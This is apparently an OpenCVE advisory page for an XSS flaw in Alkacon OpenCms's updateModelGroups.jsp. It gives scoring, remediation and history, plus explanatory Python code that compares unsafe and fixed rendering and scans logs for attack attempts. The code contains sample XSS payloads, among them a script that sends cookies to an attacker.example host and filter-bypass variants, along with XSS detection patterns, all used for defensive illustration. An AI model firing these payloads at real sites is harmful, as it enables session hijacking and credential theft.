Description
A Cross Site Scripting vulnerability in Alkacon OpenCms before 16 exists via updateModelGroups.jsp.
Published: 2026-05-08
Score: 6.1 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The advisory states only that updateModelGroups.jsp in Alkacon OpenCms is subject to cross-site scripting (CWE-79): user-controlled input reaches the page's HTML output without adequate encoding, so an attacker can inject client-side script that executes in another user's browser. The usual consequences apply: session hijacking, credential theft, and actions performed in the victim's authenticated context. The advisory does not say which request parameter is the injection point, nor whether the flaw is reflected or stored.
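To make the weakness concrete, here is an added example (not code from OpenCms, the advisory, or OpenCVE) that models a JSP echoing a request parameter into a page. The parameter name `groupName`, the surrounding markup and the three payloads are assumptions; nothing here reflects how updateModelGroups.jsp is actually written. It shows the raw sink, a blacklist fix that only strips `<script>` tags, and contextual HTML encoding, and it checks which of them still leaves executable markup in the response.

```python
"""Reflected-XSS sink and two candidate fixes, modelled on a JSP that echoes
a request parameter into an HTML response.

Added example, not code from OpenCms or from the advisory: the parameter
name `groupName`, the surrounding markup and the payloads are assumptions,
and nothing here reflects how updateModelGroups.jsp is actually written.
"""
import html
import re

# Constructed attacker inputs for the demonstration.
PAYLOAD_SCRIPT = ('<script>document.location="https://attacker.example/?c="'
                  '+document.cookie</script>')
PAYLOAD_EVENT_HANDLER = '<img src=x onerror=alert(document.domain)>'
PAYLOAD_NESTED = '<scr<script>ipt>alert(1)</scr</script>ipt>'

# Stand-in for the page fragment into which the parameter is written.
TEMPLATE = '<p>Updated model group: {value}</p>'

_SCRIPT_TAG = re.compile(r'</?script[^>]*>', re.IGNORECASE)
_ACTIVE_MARKUP = re.compile(r'<script\b|<\w+[^>]*\son\w+\s*=', re.IGNORECASE)


def render_unsafe(group_name: str) -> str:
    """The CWE-79 pattern: the parameter is written into the page verbatim."""
    return TEMPLATE.format(value=group_name)


def render_strip_script(group_name: str) -> str:
    """Blacklist fix: delete <script> tags only. Event-handler attributes
    survive untouched, and a nested payload re-forms a tag after the strip."""
    return TEMPLATE.format(value=_SCRIPT_TAG.sub('', group_name))


def render_encoded(group_name: str) -> str:
    """Contextual output encoding for HTML text content: < > & " ' become
    entities, so the browser can never parse the value as a tag."""
    return TEMPLATE.format(value=html.escape(group_name, quote=True))


def contains_active_markup(rendered: str) -> bool:
    """Rough check used only to compare the renderers: does the output still
    contain a script tag or an on*= event-handler attribute?"""
    return _ACTIVE_MARKUP.search(rendered) is not None


if __name__ == '__main__':
    renderers = [('unsafe', render_unsafe),
                 ('strip <script>', render_strip_script),
                 ('html-encode', render_encoded)]
    for label, render in renderers:
        for payload in (PAYLOAD_SCRIPT, PAYLOAD_EVENT_HANDLER, PAYLOAD_NESTED):
            out = render(payload)
            print(f'{label:15} active={contains_active_markup(out)!s:5} {out}')
```

The strip-only renderer defeats the first payload but passes the `onerror` handler through and turns the nested payload back into a working `<script>` tag, which is why tag stripping is not an acceptable fix for CWE-79; encoding for the output context (here HTML text, via `html.escape`) neutralises all three.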

Affected Systems

Alkacon OpenCms releases before version 16 are affected. The advisory gives no patched build other than the version-16 boundary, so any deployment older than 16 should be treated as vulnerable.

Risk and Exploitability

The CVSS 3.1 score is 6.1 (Medium), vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N: reachable over the network with low attack complexity and no privileges, but requiring user interaction (a victim has to load the crafted page or link), with changed scope and limited confidentiality and integrity impact. The EPSS estimate is below 1%, and the SSVC assessment recorded for this entry lists exploitation as "none" and the flaw as not automatable. The vulnerability is not in CISA's KEV catalog, so no public in-the-wild exploitation is recorded at the time of this analysis.

Generated by OpenCVE AI on May 8, 2026 at 20:01 UTC.

Remediation

No vendor fix or workaround is recorded in this entry; the affected-version range ("before 16") is the only fix indicator the advisory provides.

OpenCVE Recommended Actions

  • Upgrade Alkacon OpenCms to version 16 or later, the first release outside the affected range
  • If an upgrade is not immediately possible, restrict access to updateModelGroups.jsp (web-server or servlet-container rules) so that only privileged administrators can reach it
  • Encode user-controlled values for the HTML context in which they are written (for example with JSTL's <c:out> or an equivalent escaping function) rather than stripping script tags, which is bypassable by event-handler attributes and nested tags
  • Monitor web-server and application logs for requests to updateModelGroups.jsp whose parameters contain script or event-handler markup, including percent-encoded variants
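The monitoring step above, as an added example (not tooling from OpenCms or OpenCVE): a scanner that reads access-log lines in the common Apache/Tomcat combined format, keeps only requests whose path ends in updateModelGroups.jsp, percent-decodes each query value repeatedly so that double-encoded payloads are not missed, and reports values carrying script or event-handler markup. The /opencms/ path prefix, the groupName parameter and the four sample lines are constructed for the demonstration.

```python
"""Scan web-server access logs for requests to updateModelGroups.jsp whose
query parameters carry script or event-handler markup.

Added example, not tooling from OpenCms or OpenCVE: the log format is the
common Apache/Tomcat combined format, the path prefix /opencms/ and the
parameter name are assumptions, and the sample lines are constructed.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

TARGET_PAGE = 'updateModelGroups.jsp'

# Constructed sample lines (no real traffic).
SAMPLE_LOG = """\
203.0.113.5 - admin [08/May/2026:14:02:11 +0000] "GET /opencms/updateModelGroups.jsp?groupName=Marketing HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
198.51.100.7 - - [08/May/2026:14:05:42 +0000] "GET /opencms/updateModelGroups.jsp?groupName=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 1601 "-" "curl/8.4.0"
198.51.100.7 - - [08/May/2026:14:06:03 +0000] "GET /opencms/updateModelGroups.jsp?groupName=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 1601 "-" "curl/8.4.0"
192.0.2.9 - - [08/May/2026:14:07:15 +0000] "GET /opencms/index.html?q=%3Cscript%3E HTTP/1.1" 404 210 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# Markers that indicate an attempt to smuggle executable markup. Deliberately
# loose: this is a triage filter, not a proof of exploitation.
XSS_MARKERS = re.compile(
    r'<\s*(script|iframe|img|svg|object|embed)\b|\bon\w+\s*=|javascript:',
    re.IGNORECASE)


def deep_unquote(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded payloads are not missed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_access_log(log_text: str, page: str = TARGET_PAGE) -> list:
    """Return one finding per suspicious query parameter on requests to `page`."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m['target'])
        if not url.path.lower().endswith(page.lower()):
            continue
        # parse_qsl decodes one layer; deep_unquote handles the rest.
        for name, raw in parse_qsl(url.query, keep_blank_values=True):
            decoded = deep_unquote(raw)
            hit = XSS_MARKERS.search(decoded)
            if hit:
                findings.append({
                    'client': m['client'],
                    'time': m['ts'],
                    'status': int(m['status']),
                    'param': name,
                    'decoded': decoded,
                    'marker': hit.group(0),
                })
    return findings


if __name__ == '__main__':
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} param={f['param']} "
              f"marker={f['marker']!r} value={f['decoded']!r}")
```

On the sample input the scanner reports the two requests from 198.51.100.7 (the plain and the double-encoded payload) and ignores the benign request and the one aimed at a different page. The path filter matches the recommendation's scope; passing a different `page`, or removing the filter, turns the same logic into a site-wide XSS-attempt detector. A 200 status on a flagged request is worth a closer look than a 403, since it means the page accepted the input.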

Advisories

Source: GitHub GHSA
ID: GHSA-2887-f3v6-6rjf
Title: Alkacon OpenCms is vulnerable to XSS via updateModelGroups.jsp

History

Fri, 08 May 2026 20:30:00 +0000

Type: Title
Value: Cross-Site Scripting via updateModelGroups.jsp in Alkacon OpenCms

Fri, 08 May 2026 14:15:00 +0000

Type: Metrics
Values added:
  cvssV3_1: {'score': 6.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}
  ssvc: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Fri, 08 May 2026 06:45:00 +0000

Type: Title
Value: Cross-Site Scripting via updateModelGroups.jsp in Alkacon OpenCms
Type: First Time appeared
Values added: Alkacon; Alkacon opencms
Type: Weaknesses
Values added: CWE-79
Type: Vendors & Products
Values added: Alkacon; Alkacon opencms

Fri, 08 May 2026 05:00:00 +0000

Type: Description
Value: A Cross Site Scripting vulnerability in Alkacon OpenCms before 16 exists via updateModelGroups.jsp.
References

MITRE
Status: PUBLISHED
Assigner: mitre
Published:
Updated: 2026-05-08T12:59:37.304Z
Reserved: 2023-09-08T00:00:00.000Z
Link: CVE-2023-42345

Vulnrichment
Updated: 2026-05-08T12:59:33.726Z

NVD
Status: Deferred
Published: 2026-05-08T05:16:09.703
Modified: 2026-05-08T15:58:49.383
Link: CVE-2023-42345

Redhat
No data.

OpenCVE Enrichment
Updated: 2026-05-08T20:15:15Z

Weaknesses